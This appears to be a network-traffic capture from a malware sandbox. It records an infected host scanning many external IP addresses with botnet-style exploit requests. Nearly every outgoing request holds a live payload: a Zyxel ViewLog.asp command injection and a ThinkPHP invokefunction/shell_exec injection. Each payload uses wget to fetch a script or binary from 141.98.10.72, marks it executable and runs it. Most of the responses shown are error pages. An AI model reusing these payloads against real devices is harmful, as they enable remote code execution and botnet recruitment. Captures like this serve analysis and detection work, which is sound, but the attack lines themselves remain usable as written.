Feb 14, 2024 09:30:47.503422022 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:48.183810949 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:49.527869940 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:52.311832905 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:57.687798023 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:08.439311028 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:30.454766989 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:32:13.461432934 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
848	192.168.2.15	37792	95.43.115.163	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:47.510653019 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:47.740364075 CET	381	IN	HTTP/1.1 404 Not Found Date: Wed, 14 Feb 2024 09:44:19 GMT Server: web Cache-Control: no-cache Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
849	192.168.2.15	48084	85.31.62.40	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:47.515678883 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:47.750081062 CET	405	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:30:47 GMT Content-Type: text/html Content-Length: 248 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
850	192.168.2.15	35976	31.130.205.12	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:47.523540974 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:47.765861988 CET	158	IN	HTTP/1.1 404 Not Found Content-Type: text/plain Date: Wed, 14 Feb 2024 08:30:47 GMT Content-Length: 18 Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port
851	192.168.2.15	58858	94.122.194.217	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:47.529228926 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
852	192.168.2.15	35792	62.60.172.165	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:47.788538933 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:49.239785910 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
853	192.168.2.15	47876	95.100.179.114	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:48.091960907 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:48.297167063 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 14 Feb 2024 08:30:48 GMT Date: Wed, 14 Feb 2024 08:30:48 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 64 31 66 31 36 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 34 34 38 26 23 34 36 3b 66 62 36 62 38 61 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.ad1f1602.1707899448.fb6b8a0</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
854	192.168.2.15	52832	95.86.81.60	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:48.149471998 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
855	192.168.2.15	38848	95.59.243.129	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:48.161309004 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:48.435421944 CET	29	IN	HTTP/1.1 200 OK
Feb 14, 2024 09:30:48.435678959 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
856	192.168.2.15	51628	95.101.175.213	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:48.297254086 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:48.499252081 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:30:48 GMT Date: Wed, 14 Feb 2024 08:30:48 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 36 64 65 34 35 36 38 26 23 34 36 3b 31 37 30 37 38 39 39 34 34 38 26 23 34 36 3b 32 66 64 66 66 64 30 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.46de4568.1707899448.2fdffd0f</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
857	192.168.2.15	42972	95.216.115.168	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:48.373876095 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:48.598457098 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Wed, 14 Feb 2024 08:30:48 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
858	192.168.2.15	36270	95.85.210.224	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:48.374166012 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
859	192.168.2.15	43754	95.216.124.146	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:48.383690119 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:48.618251085 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:30:48 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
860	192.168.2.15	47620	95.57.101.214	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:48.588020086 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:48.879575014 CET	29	IN	HTTP/1.1 200 OK
Feb 14, 2024 09:30:48.881413937 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
861	192.168.2.15	58330	45.201.246.177	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:48.880320072 CET	179	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 38 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:48Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
862	192.168.2.15	45544	94.242.230.59	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:49.211416960 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
863	192.168.2.15	58384	45.201.246.177	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:49.359352112 CET	179	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 39 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:49Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
864	192.168.2.15	51350	31.136.3.176	8080

Timestamp	Bytes transferred	Direction	Data
